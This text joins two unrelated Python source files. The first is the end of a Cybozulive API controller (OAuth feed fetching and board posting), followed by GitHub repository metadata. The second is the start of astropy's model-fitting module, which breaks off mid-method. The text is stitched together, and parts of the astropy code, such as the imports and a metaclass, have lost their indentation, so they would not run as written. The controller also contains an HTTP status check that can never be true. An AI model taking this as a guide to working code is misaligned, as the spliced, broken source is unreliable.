        account = urllib.unquote_plus(account)
        param = urllib.unquote_plus(param)
        if action == "add_column":
            template_values = self.add_column()
            tmpl = os.path.join(os.path.dirname(__file__), "../view/cybozulive_add_column.html")
            return self.response.out.write(template.render(tmpl, template_values))
        if action == "accounts":
            template_values = self.accounts()
            tmpl = os.path.join(os.path.dirname(__file__), "../view/cybozulive_accounts.html")
            return self.response.out.write(template.render(tmpl, template_values))
        if action == "messages":
            # The "type" parameter selects which Cybozulive API feed to read:
            # empty -> all notifications; "board/<group>" -> that group's board;
            # anything else -> notifications filtered by category.
            type = self.request.get("type")
            if type == "":
                url = "https://api.cybozulive.com/api/notification/V2"
                template_values = self.get_messages(account, url)
                self.response.headers["Content-Type"] = "application/json"
                return self.response.out.write(simplejson.dumps(template_values))
            if type.startswith("board/"):
                url = "https://api.cybozulive.com/api/board/V2?group="+type.split("/")[1]
                template_values = self.get_messages(account, url)
                self.response.headers["Content-Type"] = "application/json"
                return self.response.out.write(simplejson.dumps(template_values))
            else:
                url = "https://api.cybozulive.com/api/notification/V2?category="+type
                template_values = self.get_messages(account, url)
                template_values["room_id"] = type
                self.response.headers["Content-Type"] = "application/json"
                return self.response.out.write(simplejson.dumps(template_values))
        # unknown action
        self.error(400)

    @need_login
    def post(self, action="", account="", param=""):
        """Handle POST requests; only ``action == "post"`` is supported.

        Builds an Atom-style XML payload and sends it via OAuth: a comment
        (when ``reply-to`` is given) or a new board topic (otherwise).
        """
        user = self.session.get_user()
        account = urllib.unquote_plus(account)
        param = urllib.unquote_plus(param)
        if action == "post":
            message = self.request.get("message")
            parent_id = self.request.get("reply-to")
            url = "https://api.cybozulive.com/api/board/V2"
            xml = '<?xml version="1.0" encoding="UTF-8"?>'
            xml += '<feed xmlns="http://www.w3.org/2005/Atom" xmlns:cbl="http://schemas.cybozulive.com/common/2010">'
            if parent_id:
                # replying: post a comment on the existing entry identified by parent_id
                xml += "<id>%s</id>" % parent_id
                xml += '<entry>'
                xml += "<summary type=\"text\">%s</summary>" % saxutils.escape(message)
                xml += "</entry>"
                url = "https://api.cybozulive.com/api/comment/V2"
            else:
                # new topic: derive a short title from the message body
                title = message[0:15]+"..." if len(message) > 15 else message
                xml += '<entry>'
                xml += "<cbl:group id=%s />" % saxutils.quoteattr(param)
                xml += "<title>%s</title>" % saxutils.escape(title)
                xml += "<summary type=\"text\">%s</summary>" % saxutils.escape(message)
                xml += "</entry>"
            xml += "</feed>"
            response, content = oauth.CybozuliveHandler.requestBody(
                user,
                account,
                url,
                body=xml.encode('utf-8'))
            status = int(response["status"])
            # NOTE(review): this condition is never true (status < 200 AND >= 300);
            # it presumably intends to reject non-2xx responses — confirm upstream.
            if status < 200 and status >= 300:
                raise Exception(response["status"] + " failed to post message. : " + content)
            self.response.out.write("Message is posted.")
            return
        # unknown action
        self.error(400)

    def add_column(self):
        """Return template values (authorized Cybozulive accounts) for the add-column page."""
        user = self.session.get_user()
        accounts = oauth.Account.gql(
            "WHERE service = :1 and user_ref = :2 and access_token != :3",
            "cybozulive", user.key(), None)
        if accounts.count() == 0:
            return {}
        template_values = {
            'accounts': accounts
        }
        return template_values

    def accounts(self):
        """Return template values (authorized Cybozulive accounts) for the accounts page."""
        user = self.session.get_user()
        accounts = oauth.Account.gql(
            "WHERE service = :1 and user_ref = :2 and access_token != :3",
            "cybozulive",
            user.key(),
            None)
        if accounts.count() == 0:
            return {}
        template_values = {
            'accounts': accounts
        }
        return template_values

    def get_messages(self, account, url):
        """Fetch and parse an Atom feed from the Cybozulive API.

        :param account: Account name used to sign the OAuth request.
        :param url: Feed URL to fetch.
        :return: Dict of template values with feed metadata and parsed messages.
        :raises Exception: If the API responds with a non-200 status.
        """
        user = self.session.get_user()
        response, content = oauth.CybozuliveHandler.request(user, account, url)
        if response["status"] != "200":
            raise Exception(response["status"] + " failed to get messages. : " + url)
        result = feedparser.parse(content)
        messages = []
        for entry in result.entries:
            messages.append({
                "id": entry.id,
                "title": entry.title,
                "link": entry.link,
                "author": entry.author,
                # escape HTML then preserve line breaks for display
                "summary": re.sub("\n", '<br/>', utils.escape_html(entry.summary)) if hasattr(entry, "summary") else "",
                "updated": datetime.datetime(*entry.updated_parsed[:6]).strftime("%a %b %d %H:%M:%S %Y")
            })
        template_values = {
            'service': 'cybozulive',
            "title": result.feed.title,
            "link": result.feed.link,
            "feed_url": url,
            'messages': messages
        }
        return template_values
"""
private
category_dict = {
"MYPAGE":"マイページ",
"GROUP":"グループ",
"MP_SCHEDULE":"マイスケジュール",
"G_SCHEDULE":"グループイベント",
"MESSAGE":"メッセージ",
"TASK":"ToDoリスト",
"BOARD":"掲示板",
"CABINET":"共有フォルダ",
"MEMBER_LIST":"グループへの入退会"
}
def convert_category(category):
result = ""
category[0]
"""
def get_profiles(accounts):
    """Collect group-posting profiles for every authorized Cybozulive account.

    Pages through the Cybozulive group API (100 entries at a time), caches the
    raw feed on each account entity, and builds one profile dict per group.

    :param accounts: Iterable of oauth.Account entities (any service).
    :return: List of profile dicts with keys ``service``, ``account_name``, ``url``, ``name``.
    """
    profiles = []
    max_results = 100
    for account in accounts:
        # skip accounts for other services, or ones that were never authorized
        if account.service != "cybozulive" or account.access_token is None:
            continue
        # TODO: avoid unconditionally refreshing the cached profile info on every call
        start_index = 0
        while True:
            response, content = oauth.CybozuliveHandler.request_with_account(account, "https://api.cybozulive.com/api/group/V2?max-results=%s&start-index=%s" % (str(max_results), str(start_index)))
            # cache the raw feed on the account entity
            account.account_info = unicode(content, 'utf-8')
            account.put()
            account_info = feedparser.parse(account.account_info)
            for group in account_info.entries:
                profiles.append({
                    "service": "cybozulive",
                    "account_name": account.account_name,
                    "url": "cybozulive/post/" + account.account_name + "/" + group.id.split(",")[1],
                    "name": group.title + "/" + account.account_name
                })
            # a short page means we've reached the end of the group list
            if len(account_info.entries) < max_results:
                break
            start_index += max_results
    return profiles
"content_hash": "4429d1609a7e3093ac2e7731fbaa5c5f",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 197,
"avg_line_length": 41.85635359116022,
"alnum_prop": 0.53629883843717,
"repo_name": "co-meeting/crowy",
"id": "a05a7286bd479c8f3e855534c71132fe626c0f57",
"size": "7778",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/controller/cybozulive.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "657626"
},
{
"name": "Python",
"bytes": "404210"
},
{
"name": "Ruby",
"bytes": "3890"
},
{
"name": "Shell",
"bytes": "1803"
}
],
"symlink_target": ""
} |
"""
This module implements classes (called Fitters) which combine optimization
algorithms (typically from `scipy.optimize`) with statistic functions to perform
fitting. Fitters are implemented as callable classes. In addition to the data
to fit, the ``__call__`` method takes an instance of
`~astropy.modeling.core.FittableModel` as input, and returns a copy of the
model with its parameters determined by the optimizer.
Optimization algorithms, called "optimizers" are implemented in
`~astropy.modeling.optimizers` and statistic functions are in
`~astropy.modeling.statistic`. The goal is to provide an easy to extend
framework and allow users to easily create new fitters by combining statistics
with optimizers.
There are two exceptions to the above scheme.
`~astropy.modeling.fitting.LinearLSQFitter` uses Numpy's `~numpy.linalg.lstsq`
function. `~astropy.modeling.fitting.LevMarLSQFitter` uses
`~scipy.optimize.leastsq` which combines optimization and statistic in one
implementation.
"""
# pylint: disable=invalid-name
import abc
import inspect
import operator
import warnings
try:
from importlib.metadata import entry_points
except ImportError:
from importlib_metadata import entry_points
from functools import reduce, wraps
import numpy as np
from astropy.units import Quantity
from astropy.utils.exceptions import AstropyUserWarning
from .utils import poly_map_domain, _combine_equivalency_dict
from .optimizers import (SLSQP, Simplex)
from .statistic import (leastsquare)
from .optimizers import (DEFAULT_MAXITER, DEFAULT_EPS, DEFAULT_ACC)
__all__ = ['LinearLSQFitter', 'LevMarLSQFitter', 'FittingWithOutlierRemoval',
'SLSQPLSQFitter', 'SimplexLSQFitter', 'JointFitter', 'Fitter',
"ModelLinearityError", "ModelsError"]
# Statistic functions implemented in `astropy.modeling.statistic`
STATISTICS = [leastsquare]
# Optimizers implemented in `astropy.modeling.optimizers`
OPTIMIZERS = [Simplex, SLSQP]
class Covariance():
    """Class for covariance matrix calculated by fitter. """

    def __init__(self, cov_matrix, param_names):
        # Raw covariance matrix plus the parameter names labelling its axes.
        self.cov_matrix = cov_matrix
        self.param_names = param_names

    def pprint(self, max_lines, round_val):
        # Render the lower triangle of the covariance matrix: one labelled
        # row per parameter, at most ``max_lines`` rows, floats rounded to
        # ``round_val`` decimal places.
        width = max(len(name) for name in self.param_names)
        rendered = 'parameter variances / covariances \n'
        # Template with the label column blank; the parameter name is then
        # substituted over the leading spaces for each row.
        template = f'{"": <{width}}| {{0}}\n'
        for idx, row in enumerate(self.cov_matrix):
            if idx > max_lines - 1:
                rendered += '...'
                continue
            name = self.param_names[idx]
            # Strip the surrounding "array([...])" from the numpy repr,
            # keeping only the comma-separated values.
            values = repr(np.round(row[:idx + 1], round_val))[7:-2]
            rendered += template.replace(' ' * len(name), name, 1).format(values)
        return rendered.rstrip()

    def __repr__(self):
        return self.pprint(max_lines=10, round_val=3)

    def __getitem__(self, params):
        # Index by a pair of parameter names, or a pair of integer indices.
        if len(params) != 2:
            raise ValueError('Covariance must be indexed by two values.')
        all_names = all(isinstance(item, str) for item in params)
        all_ints = all(isinstance(item, int) for item in params)
        if all_names:
            i1 = self.param_names.index(params[0])
            i2 = self.param_names.index(params[1])
        elif all_ints:
            i1, i2 = params
        else:
            raise TypeError('Covariance can be indexed by two parameter names or integer indices.')
        return self.cov_matrix[i1][i2]
class StandardDeviations():
    """ Class for fitting uncertainties."""

    def __init__(self, cov_matrix, param_names):
        # Parameter names label the entries of ``stds`` in order.
        self.param_names = param_names
        self.stds = self._calc_stds(cov_matrix)

    def _calc_stds(self, cov_matrix):
        # sometimes scipy lstsq returns a non-sensical negative vals in the
        # diagonals of the cov_x it computes.
        return [np.sqrt(var) if var > 0 else None
                for var in np.diag(cov_matrix)]

    def pprint(self, max_lines, round_val):
        # One labelled line per parameter, truncated after ``max_lines``.
        width = max(len(name) for name in self.param_names)
        rendered = 'standard deviations\n'
        template = '{0}{1}| {2}\n'
        for idx, std in enumerate(self.stds):
            if idx > max_lines - 1:
                rendered += '...'
                continue
            name = self.param_names[idx]
            padding = ' ' * (width - len(name))
            rendered += template.format(name, padding,
                                        str(np.round(std, round_val)))
        return rendered.rstrip()

    def __repr__(self):
        return self.pprint(max_lines=10, round_val=3)

    def __getitem__(self, param):
        # Accept either a parameter name or a plain integer position.
        if isinstance(param, str):
            idx = self.param_names.index(param)
        elif isinstance(param, int):
            idx = param
        else:
            raise TypeError('Standard deviation can be indexed by parameter name or integer.')
        return self.stds[idx]
class ModelsError(Exception):
    """Base class for model exceptions"""
class ModelLinearityError(ModelsError):
    """ Raised when a non-linear model is passed to a linear fitter."""
# NOTE(review): also inherits ValueError, presumably so existing
# ``except ValueError`` handlers in callers keep catching this — confirm.
class UnsupportedConstraintError(ModelsError, ValueError):
    """
    Raised when a fitter does not support a type of constraint.
    """
class _FitterMeta(abc.ABCMeta):
"""
Currently just provides a registry for all Fitter classes.
"""
registry = set()
def __new__(mcls, name, bases, members):
cls = super().__new__(mcls, name, bases, members)
if not inspect.isabstract(cls) and not name.startswith('_'):
mcls.registry.add(cls)
return cls
def fitter_unit_support(func):
    """
    This is a decorator that can be used to add support for dealing with
    quantities to any __call__ method on a fitter which may not support
    quantities itself. This is done by temporarily removing units from all
    parameters then adding them back once the fitting has completed.
    """
    @wraps(func)
    def wrapper(self, model, x, y, z=None, **kwargs):
        # ``equivalencies`` is consumed here so the wrapped fitter never
        # sees it as an unexpected keyword argument.
        equivalencies = kwargs.pop('equivalencies', None)

        data_has_units = (isinstance(x, Quantity) or
                          isinstance(y, Quantity) or
                          isinstance(z, Quantity))

        model_has_units = model._has_units

        if data_has_units or model_has_units:
            if model._supports_unit_fitting:
                # We now combine any instance-level input equivalencies with user
                # specified ones at call-time.
                input_units_equivalencies = _combine_equivalency_dict(
                    model.inputs, equivalencies, model.input_units_equivalencies)

                # If input_units is defined, we transform the input data into those
                # expected by the model. We hard-code the input names 'x', and 'y'
                # here since FittableModel instances have input names ('x',) or
                # ('x', 'y')
                if model.input_units is not None:
                    if isinstance(x, Quantity):
                        x = x.to(model.input_units[model.inputs[0]],
                                 equivalencies=input_units_equivalencies[model.inputs[0]])
                    if isinstance(y, Quantity) and z is not None:
                        y = y.to(model.input_units[model.inputs[1]],
                                 equivalencies=input_units_equivalencies[model.inputs[1]])

                # Create a dictionary mapping the real model inputs and outputs
                # names to the data. This remapping of names must be done here,
                # after the input data is converted to the correct units.
                rename_data = {model.inputs[0]: x}
                if z is not None:
                    # 2D case: y is a second input coordinate and z the data.
                    rename_data[model.outputs[0]] = z
                    rename_data[model.inputs[1]] = y
                else:
                    # 1D case: y is the dependent data.
                    rename_data[model.outputs[0]] = y
                    rename_data['z'] = None

                # We now strip away the units from the parameters, taking care to
                # first convert any parameters to the units that correspond to the
                # input units (to make sure that initial guesses on the parameters)
                # are in the right unit system
                model = model.without_units_for_data(**rename_data)

                # We strip away the units from the input itself
                add_back_units = False

                if isinstance(x, Quantity):
                    add_back_units = True
                    xdata = x.value
                else:
                    xdata = np.asarray(x)

                if isinstance(y, Quantity):
                    add_back_units = True
                    ydata = y.value
                else:
                    ydata = np.asarray(y)

                if z is not None:
                    if isinstance(z, Quantity):
                        add_back_units = True
                        zdata = z.value
                    else:
                        zdata = np.asarray(z)

                # We run the fitting on the plain (unitless) arrays.
                if z is None:
                    model_new = func(self, model, xdata, ydata, **kwargs)
                else:
                    model_new = func(self, model, xdata, ydata, zdata, **kwargs)

                # And finally we add back units to the parameters
                if add_back_units:
                    model_new = model_new.with_units_from_data(**rename_data)
                return model_new

            else:
                raise NotImplementedError("This model does not support being "
                                          "fit to data with units.")

        else:
            # No units anywhere: call the wrapped fitter untouched.
            return func(self, model, x, y, z=z, **kwargs)

    return wrapper
class Fitter(metaclass=_FitterMeta):
    """
    Base class for all fitters.

    Parameters
    ----------
    optimizer : callable
        A callable implementing an optimization algorithm
    statistic : callable
        Statistic function
    """

    # Constraint types this fitter understands; subclasses override.
    supported_constraints = []

    def __init__(self, optimizer, statistic):
        if optimizer is None:
            raise ValueError("Expected an optimizer.")
        if statistic is None:
            raise ValueError("Expected a statistic function.")

        if inspect.isclass(optimizer):
            # a callable class
            self._opt_method = optimizer()
        elif callable(optimizer):
            # Accept any callable (plain function, lambda, builtin,
            # functools.partial, callable instance), matching the documented
            # "optimizer : callable" contract; previously only objects for
            # which inspect.isfunction() is True were accepted.
            self._opt_method = optimizer
        else:
            raise ValueError("Expected optimizer to be a callable class or a function.")
        if inspect.isclass(statistic):
            self._stat_method = statistic()
        else:
            self._stat_method = statistic

    def objective_function(self, fps, *args):
        """
        Function to minimize.

        Parameters
        ----------
        fps : list
            parameters returned by the fitter
        args : list
            [model, [other_args], [input coordinates]]
            other_args may include weights or any other quantities specific for
            a statistic

        Notes
        -----
        The list of arguments (args) is set in the `__call__` method.
        Fitters may overwrite this method, e.g. when statistic functions
        require other arguments.
        """
        model = args[0]
        meas = args[-1]
        # Push the trial parameter vector into the model before evaluating
        # the statistic against the measurements.
        _fitter_to_model_params(model, fps)
        res = self._stat_method(meas, model, *args[1:-1])
        return res

    @staticmethod
    def _add_fitting_uncertainties(*args):
        """
        When available, calculate and sets the parameter covariance matrix
        (model.cov_matrix) and standard deviations (model.stds).
        """
        # Default: no uncertainty information; subclasses may override.
        return None

    @abc.abstractmethod
    def __call__(self):
        """
        This method performs the actual fitting and modifies the parameter list
        of a model.

        Fitter subclasses should implement this method.
        """
        raise NotImplementedError("Subclasses should implement this method.")
# TODO: I have ongoing branch elsewhere that's refactoring this module so that
# all the fitter classes in here are Fitter subclasses. In the meantime we
# need to specify that _FitterMeta is its metaclass.
class LinearLSQFitter(metaclass=_FitterMeta):
    """
    A class performing a linear least square fitting.

    Uses `numpy.linalg.lstsq` to do the fitting.
    Given a model and data, fits the model to the data and changes the
    model's parameters. Keeps a dictionary of auxiliary fitting information.

    Notes
    -----
    Note that currently LinearLSQFitter does not support compound models.
    """

    supported_constraints = ['fixed']
    # This fitter can handle masked dependent data for model sets.
    supports_masked_input = True

    def __init__(self, calc_uncertainties=False):
        # Auxiliary information from the last np.linalg.lstsq call.
        self.fit_info = {'residuals': None,
                         'rank': None,
                         'singular_values': None,
                         'params': None
                         }
        # When True, also compute the parameter covariance matrix.
        self._calc_uncertainties=calc_uncertainties

    @staticmethod
    def _is_invertible(m):
        """Check if inverse of matrix can be obtained."""
        if m.shape[0] != m.shape[1]:
            return False
        if np.linalg.matrix_rank(m) < m.shape[0]:
            return False
        return True

    def _add_fitting_uncertainties(self, model, a, n_coeff, x, y, z=None,
                                   resids=None):
        """
        Calculate and parameter covariance matrix and standard deviations
        and set `cov_matrix` and `stds` attributes.
        """
        x_dot_x_prime = np.dot(a.T, a)
        masked = False or hasattr(y, 'mask')

        # check if invertible. if not, can't calc covariance.
        if not self._is_invertible(x_dot_x_prime):
            return(model)
        inv_x_dot_x_prime = np.linalg.inv(x_dot_x_prime)

        if z is None:  # 1D models
            if len(model) == 1:  # single model
                mask = None
                if masked:
                    mask = y.mask
                xx = np.ma.array(x, mask=mask)
                RSS = [(1/(xx.count()-n_coeff)) * resids]

            if len(model) > 1:  # model sets
                RSS = []  # collect sum residuals squared for each model in set
                for j in range(len(model)):
                    mask = None
                    if masked:
                        mask = y.mask[..., j].flatten()
                    xx = np.ma.array(x, mask=mask)
                    eval_y = model(xx, model_set_axis=False)
                    eval_y = np.rollaxis(eval_y, model.model_set_axis)[j]
                    RSS.append((1/(xx.count()-n_coeff)) * np.sum((y[..., j] - eval_y)**2))

        else:  # 2D model
            if len(model) == 1:
                mask = None
                if masked:
                    warnings.warn('Calculation of fitting uncertainties '
                                  'for 2D models with masked values not '
                                  'currently supported.\n',
                                  AstropyUserWarning)
                    return
                xx, yy = np.ma.array(x, mask=mask), np.ma.array(y, mask=mask)
                # len(xx) instead of xx.count. this will break if values are masked?
                RSS = [(1/(len(xx)-n_coeff)) * resids]
            else:
                RSS = []
                for j in range(len(model)):
                    eval_z = model(x, y, model_set_axis=False)
                    mask = None  # need to figure out how to deal w/ masking here.
                    if model.model_set_axis == 1:
                        # model_set_axis passed when evaluating only refers to input shapes
                        # so output must be reshaped for model_set_axis=1.
                        eval_z = np.rollaxis(eval_z, 1)
                    eval_z = eval_z[j]
                    RSS.append([(1/(len(x)-n_coeff)) * np.sum((z[j] - eval_z)**2)])

        # One covariance matrix per model in the set (scaled by its RSS).
        covs = [inv_x_dot_x_prime * r for r in RSS]
        free_param_names = [x for x in model.fixed if (model.fixed[x] is False)
                            and (model.tied[x] is False)]

        if len(covs) == 1:
            model.cov_matrix = Covariance(covs[0], model.param_names)
            model.stds = StandardDeviations(covs[0], free_param_names)
        else:
            model.cov_matrix = [Covariance(cov, model.param_names) for cov in covs]
            model.stds = [StandardDeviations(cov, free_param_names) for cov in covs]

    @staticmethod
    def _deriv_with_constraints(model, param_indices, x=None, y=None):
        """Evaluate ``model.fit_deriv`` and keep only the terms for the
        requested parameter indices (used to separate fitted from fixed
        parameters)."""
        if y is None:
            d = np.array(model.fit_deriv(x, *model.parameters))
        else:
            d = np.array(model.fit_deriv(x, y, *model.parameters))

        if model.col_fit_deriv:
            return d[param_indices]
        else:
            return d[..., param_indices]

    def _map_domain_window(self, model, x, y=None):
        """
        Maps domain into window for a polynomial model which has these
        attributes.
        """
        if y is None:
            if hasattr(model, 'domain') and model.domain is None:
                model.domain = [x.min(), x.max()]
            if hasattr(model, 'window') and model.window is None:
                model.window = [-1, 1]
            return poly_map_domain(x, model.domain, model.window)
        else:
            if hasattr(model, 'x_domain') and model.x_domain is None:
                model.x_domain = [x.min(), x.max()]
            if hasattr(model, 'y_domain') and model.y_domain is None:
                model.y_domain = [y.min(), y.max()]
            if hasattr(model, 'x_window') and model.x_window is None:
                model.x_window = [-1., 1.]
            if hasattr(model, 'y_window') and model.y_window is None:
                model.y_window = [-1., 1.]
            xnew = poly_map_domain(x, model.x_domain, model.x_window)
            ynew = poly_map_domain(y, model.y_domain, model.y_window)
            return xnew, ynew

    @fitter_unit_support
    def __call__(self, model, x, y, z=None, weights=None, rcond=None):
        """
        Fit data to this model.

        Parameters
        ----------
        model : `~astropy.modeling.FittableModel`
            model to fit to x, y, z
        x : array
            Input coordinates
        y : array-like
            Input coordinates
        z : array-like, optional
            Input coordinates.
            If the dependent (``y`` or ``z``) co-ordinate values are provided
            as a `numpy.ma.MaskedArray`, any masked points are ignored when
            fitting. Note that model set fitting is significantly slower when
            there are masked points (not just an empty mask), as the matrix
            equation has to be solved for each model separately when their
            co-ordinate grids differ.
        weights : array, optional
            Weights for fitting.
            For data with Gaussian uncertainties, the weights should be
            1/sigma.
        rcond : float, optional
            Cut-off ratio for small singular values of ``a``.
            Singular values are set to zero if they are smaller than ``rcond``
            times the largest singular value of ``a``.
        equivalencies : list or None, optional, keyword-only
            List of *additional* equivalencies that are should be applied in
            case x, y and/or z have units. Default is None.

        Returns
        -------
        model_copy : `~astropy.modeling.FittableModel`
            a copy of the input model with parameters set by the fitter
        """
        if not model.fittable:
            raise ValueError("Model must be a subclass of FittableModel")

        if not model.linear:
            raise ModelLinearityError('Model is not linear in parameters, '
                                      'linear fit methods should not be used.')

        if hasattr(model, "submodel_names"):
            raise ValueError("Model must be simple, not compound")

        _validate_constraints(self.supported_constraints, model)

        model_copy = model.copy()
        model_copy.sync_constraints = False
        _, fitparam_indices = _model_to_fit_params(model_copy)

        if model_copy.n_inputs == 2 and z is None:
            raise ValueError("Expected x, y and z for a 2 dimensional model.")

        farg = _convert_input(x, y, z, n_models=len(model_copy),
                              model_set_axis=model_copy.model_set_axis)

        has_fixed = any(model_copy.fixed.values())

        # This is also done by _convert_input, but we need it here to allow
        # checking the array dimensionality before that gets called:
        if weights is not None:
            weights = np.asarray(weights, dtype=float)

        if has_fixed:
            # The list of fixed params is the complement of those being fitted:
            fixparam_indices = [idx for idx in
                                range(len(model_copy.param_names))
                                if idx not in fitparam_indices]

            # Construct matrix of user-fixed parameters that can be dotted with
            # the corresponding fit_deriv() terms, to evaluate corrections to
            # the dependent variable in order to fit only the remaining terms:
            fixparams = np.asarray([getattr(model_copy,
                                            model_copy.param_names[idx]).value
                                    for idx in fixparam_indices])

        if len(farg) == 2:
            # 1D fit: build the design matrix (lhs) and dependent data (rhs).
            x, y = farg

            if weights is not None:
                # If we have separate weights for each model, apply the same
                # conversion as for the data, otherwise check common weights
                # as if for a single model:
                _, weights = _convert_input(
                    x, weights,
                    n_models=len(model_copy) if weights.ndim == y.ndim else 1,
                    model_set_axis=model_copy.model_set_axis
                )

            # map domain into window
            if hasattr(model_copy, 'domain'):
                x = self._map_domain_window(model_copy, x)
            if has_fixed:
                lhs = np.asarray(self._deriv_with_constraints(model_copy,
                                                              fitparam_indices,
                                                              x=x))
                fixderivs = self._deriv_with_constraints(model_copy, fixparam_indices, x=x)
            else:
                lhs = np.asarray(model_copy.fit_deriv(x, *model_copy.parameters))
            sum_of_implicit_terms = model_copy.sum_of_implicit_terms(x)
            rhs = y
        else:
            # 2D fit: two input coordinates, z is the dependent data.
            x, y, z = farg

            if weights is not None:
                # If we have separate weights for each model, apply the same
                # conversion as for the data, otherwise check common weights
                # as if for a single model:
                _, _, weights = _convert_input(
                    x, y, weights,
                    n_models=len(model_copy) if weights.ndim == z.ndim else 1,
                    model_set_axis=model_copy.model_set_axis
                )

            # map domain into window
            if hasattr(model_copy, 'x_domain'):
                x, y = self._map_domain_window(model_copy, x, y)

            if has_fixed:
                lhs = np.asarray(self._deriv_with_constraints(model_copy,
                                                              fitparam_indices, x=x, y=y))
                fixderivs = self._deriv_with_constraints(model_copy,
                                                         fixparam_indices,
                                                         x=x, y=y)
            else:
                lhs = np.asanyarray(model_copy.fit_deriv(x, y, *model_copy.parameters))
            sum_of_implicit_terms = model_copy.sum_of_implicit_terms(x, y)

            if len(model_copy) > 1:
                # Just to be explicit (rather than baking in False == 0):
                model_axis = model_copy.model_set_axis or 0

                if z.ndim > 2:
                    # For higher-dimensional z, flatten all the axes except the
                    # dimension along which models are stacked and transpose so
                    # the model axis is *last* (I think this resolves Erik's
                    # pending generalization from 80a6f25a):
                    rhs = np.rollaxis(z, model_axis, z.ndim)
                    rhs = rhs.reshape(-1, rhs.shape[-1])
                else:
                    # This "else" seems to handle the corner case where the
                    # user has already flattened x/y before attempting a 2D fit
                    # but z has a second axis for the model set. NB. This is
                    # ~5-10x faster than using rollaxis.
                    rhs = z.T if model_axis == 0 else z

                if weights is not None:
                    # Same for weights
                    if weights.ndim > 2:
                        # Separate 2D weights for each model:
                        weights = np.rollaxis(weights, model_axis, weights.ndim)
                        weights = weights.reshape(-1, weights.shape[-1])
                    elif weights.ndim == z.ndim:
                        # Separate, flattened weights for each model:
                        weights = weights.T if model_axis == 0 else weights
                    else:
                        # Common weights for all the models:
                        weights = weights.flatten()
            else:
                rhs = z.flatten()
                if weights is not None:
                    weights = weights.flatten()

        # If the derivative is defined along rows (as with non-linear models)
        if model_copy.col_fit_deriv:
            lhs = np.asarray(lhs).T

        # Some models (eg. Polynomial1D) don't flatten multi-dimensional inputs
        # when constructing their Vandermonde matrix, which can lead to obscure
        # failures below. Ultimately, np.linalg.lstsq can't handle >2D matrices,
        # so just raise a slightly more informative error when this happens:
        if np.asanyarray(lhs).ndim > 2:
            raise ValueError('{} gives unsupported >2D derivative matrix for '
                             'this x/y'.format(type(model_copy).__name__))

        # Subtract any terms fixed by the user from (a copy of) the RHS, in
        # order to fit the remaining terms correctly:
        if has_fixed:
            if model_copy.col_fit_deriv:
                fixderivs = np.asarray(fixderivs).T  # as for lhs above
            rhs = rhs - fixderivs.dot(fixparams)  # evaluate user-fixed terms

        # Subtract any terms implicit in the model from the RHS, which, like
        # user-fixed terms, affect the dependent variable but are not fitted:
        if sum_of_implicit_terms is not None:
            # If we have a model set, the extra axis must be added to
            # sum_of_implicit_terms as its innermost dimension, to match the
            # dimensionality of rhs after _convert_input "rolls" it as needed
            # by np.linalg.lstsq. The vector then gets broadcast to the right
            # number of sets (columns). This assumes all the models share the
            # same input co-ordinates, as is currently the case.
            if len(model_copy) > 1:
                sum_of_implicit_terms = sum_of_implicit_terms[..., np.newaxis]
            rhs = rhs - sum_of_implicit_terms

        if weights is not None:
            if rhs.ndim == 2:
                if weights.shape == rhs.shape:
                    # separate weights for multiple models case: broadcast
                    # lhs to have more dimension (for each model)
                    lhs = lhs[..., np.newaxis] * weights[:, np.newaxis]
                    rhs = rhs * weights
                else:
                    lhs *= weights[:, np.newaxis]
                    # Don't modify in-place in case rhs was the original
                    # dependent variable array
                    rhs = rhs * weights[:, np.newaxis]
            else:
                lhs *= weights[:, np.newaxis]
                rhs = rhs * weights

        # Normalize the columns of the design matrix to improve conditioning;
        # the solved coefficients are rescaled by ``scl`` again below.
        scl = (lhs * lhs).sum(0)
        lhs /= scl

        masked = np.any(np.ma.getmask(rhs))
        if weights is not None and not masked and np.any(np.isnan(lhs)):
            raise ValueError('Found NaNs in the coefficient matrix, which '
                             'should not happen and would crash the lapack '
                             'routine. Maybe check that weights are not null.')

        a = None  # need for calculating covarience

        if ((masked and len(model_copy) > 1) or
                (weights is not None and weights.ndim > 1)):

            # Separate masks or weights for multiple models case: Numpy's
            # lstsq supports multiple dimensions only for rhs, so we need to
            # loop manually on the models. This may be fixed in the future
            # with https://github.com/numpy/numpy/pull/15777.

            # Initialize empty array of coefficients and populate it one model
            # at a time. The shape matches the number of coefficients from the
            # Vandermonde matrix and the number of models from the RHS:
            lacoef = np.zeros(lhs.shape[1:2] + rhs.shape[-1:], dtype=rhs.dtype)

            # Arrange the lhs as a stack of 2D matrices that we can iterate
            # over to get the correctly-orientated lhs for each model:
            if lhs.ndim > 2:
                lhs_stack = np.rollaxis(lhs, -1, 0)
            else:
                lhs_stack = np.broadcast_to(lhs, rhs.shape[-1:] + lhs.shape)

            # Loop over the models and solve for each one. By this point, the
            # model set axis is the second of two. Transpose rather than using,
            # say, np.moveaxis(array, -1, 0), since it's slightly faster and
            # lstsq can't handle >2D arrays anyway. This could perhaps be
            # optimized by collecting together models with identical masks
            # (eg. those with no rejected points) into one operation, though it
            # will still be relatively slow when calling lstsq repeatedly.
            for model_lhs, model_rhs, model_lacoef in zip(lhs_stack, rhs.T, lacoef.T):

                # Cull masked points on both sides of the matrix equation:
                good = ~model_rhs.mask if masked else slice(None)
                model_lhs = model_lhs[good]
                model_rhs = model_rhs[good][..., np.newaxis]
                a = model_lhs

                # Solve for this model:
                t_coef, resids, rank, sval = np.linalg.lstsq(model_lhs,
                                                             model_rhs, rcond)
                model_lacoef[:] = t_coef.T

        else:
            # If we're fitting one or more models over a common set of points,
            # we only have to solve a single matrix equation, which is an order
            # of magnitude faster than calling lstsq() once per model below:

            good = ~rhs.mask if masked else slice(None)  # latter is a no-op
            a = lhs[good]
            # Solve for one or more models:
            lacoef, resids, rank, sval = np.linalg.lstsq(lhs[good],
                                                         rhs[good], rcond)

        self.fit_info['residuals'] = resids
        self.fit_info['rank'] = rank
        self.fit_info['singular_values'] = sval

        # Undo the column normalization applied via ``scl`` above.
        lacoef /= scl[:, np.newaxis] if scl.ndim < rhs.ndim else scl
        self.fit_info['params'] = lacoef

        _fitter_to_model_params(model_copy, lacoef.flatten())

        # TODO: Only Polynomial models currently have an _order attribute;
        # maybe change this to read isinstance(model, PolynomialBase)
        if hasattr(model_copy, '_order') and len(model_copy) == 1 \
                and not has_fixed and rank != model_copy._order:
            warnings.warn("The fit may be poorly conditioned\n",
                          AstropyUserWarning)

